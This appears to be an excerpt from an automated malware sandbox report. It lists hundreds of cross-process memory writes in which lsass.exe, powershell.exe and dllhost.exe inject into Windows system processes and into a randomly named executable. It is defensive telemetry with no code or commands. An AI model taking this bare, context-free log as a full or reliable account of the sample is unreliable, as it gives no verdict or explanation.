Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C0F0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 498A22B010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000
